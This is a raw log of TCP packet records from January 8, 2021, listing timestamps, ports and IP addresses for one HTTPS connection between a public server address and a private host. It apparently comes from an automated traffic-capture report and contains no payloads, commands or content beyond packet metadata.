                                                        Jan 8, 2021 09:08:31.622998953 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.623024940 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.623044968 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.623064041 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.623114109 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.623136997 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.623352051 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.623374939 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.623393059 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.623409986 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.623436928 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.623465061 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.624339104 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.624361992 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.624378920 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.624392033 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.624505997 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.625217915 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.766738892 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.766769886 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.766788006 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.766805887 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.766904116 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.766983986 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.767000914 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.767015934 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.767035007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.767049074 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.767086029 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.767714024 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.767734051 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.767750978 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.767765999 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.767857075 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.768615007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.888005972 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.888045073 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.888067007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.888087988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.888195038 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.888360977 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.888394117 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.888423920 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.888452053 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.888505936 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.889281988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.889312029 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.889344931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.889365911 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.889374971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.889506102 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.890243053 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.890269995 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.890321970 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.890345097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.890367985 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.890454054 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.891110897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.891130924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.891146898 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.891164064 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.891201019 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.892024040 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.892041922 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.892054081 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.892067909 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.892119884 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.892151117 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.892961025 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.892982960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.893001080 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.893018007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.893070936 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.893513918 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.894010067 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894052982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894102097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894145966 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894160032 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.894853115 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894877911 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894921064 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894961119 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894988060 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.895047903 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.895792007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.895854950 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.895906925 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.895948887 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.896003008 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.896775007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.896815062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.896853924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.896893024 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.896949053 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.897654057 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.897694111 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.897725105 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.897756100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.897867918 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.898578882 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.898618937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.898665905 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.898708105 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.898709059 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.899527073 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.899554014 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.899594069 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.899652958 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.899684906 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.899782896 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.900435925 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.900480032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.900495052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.900544882 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.900614977 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.901365995 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.901457071 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.901483059 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.901501894 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.901551008 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.901623011 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.902343035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.902406931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.902457952 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.902499914 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.902565002 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.903254032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.903305054 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.903348923 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.903363943 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.903388977 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.903460979 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.904185057 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.904226065 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.904264927 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.904303074 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.904324055 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.904364109 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.905216932 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.905257940 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.905302048 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.905354977 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.905373096 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.905430079 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.906049013 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.906091928 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.906130075 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.906167984 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.906214952 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.906985044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.907093048 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.907229900 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.907294989 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.907354116 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.907444000 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.907927036 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.907972097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908010960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908049107 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908068895 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.908116102 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.908868074 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908919096 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908962965 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908999920 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.909008026 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.909069061 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.909817934 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.909884930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.909924030 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.909972906 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.909998894 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.910691023 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.910718918 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.910747051 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.910785913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.910825968 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.911643982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.911684990 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.911720991 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.911758900 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.911760092 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.912595987 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.912636042 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.912661076 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.912683010 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.912705898 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.931948900 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932106018 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932131052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932152033 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932228088 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.932262897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932308912 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.932332039 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932354927 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932375908 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932419062 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.933398962 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.933438063 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.933459044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.933489084 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.933500051 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.934267044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.934351921 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.944137096 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944169044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944189072 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944210052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944277048 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.944498062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944523096 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944541931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944561958 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944587946 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.944602013 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.945442915 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.945475101 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.945496082 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.945522070 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.945528030 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.945647955 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.946347952 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.946419954 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.946441889 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.946464062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.946487904 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.946492910 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.946522951 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.947367907 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.947391987 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.947412968 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.947433949 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.947458029 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.948281050 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.948307991 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.948328018 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.948352098 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.948379040 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.948389053 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.949289083 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.949320078 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.949342012 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.949362993 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.949366093 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.950174093 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.950198889 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.950218916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.950239897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.950241089 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.950248003 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.951085091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.951117992 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.951138020 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.951142073 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.951158047 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.951200008 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.952004910 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.952033997 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.952055931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.952068090 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.952080011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.952115059 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.952965021 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.952995062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.953016043 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.953027010 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.953037024 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.953089952 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.953876972 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.953907013 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.953927994 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.953943968 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.953965902 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.954013109 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.954803944 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.954833984 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.954850912 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.954868078 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.954917908 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.955746889 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.955766916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.955790997 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.955813885 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.955817938 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.955852032 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.956681967 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.956708908 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.956728935 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.956753016 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.956764936 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.957633018 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.957658052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.957678080 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.957700014 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.957700014 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.957715034 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.958566904 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.958594084 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.958605051 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.958621025 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.958642960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.958662033 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.959497929 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.959525108 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.959544897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.959564924 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.959570885 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.959592104 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.960442066 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.960474968 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.960493088 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.960505009 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.960516930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.960550070 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.961424112 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.961461067 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.961478949 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.961503983 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.961509943 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.961543083 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.961870909 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.962277889 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.962301016 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.962321043 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.962342024 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.962344885 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.962621927 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.963188887 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.963212013 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.963253975 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.963592052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.963618994 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.963643074 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.963666916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.963707924 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.964557886 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.964581966 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.964606047 CET44349177104.18.58.219192.168.2.22
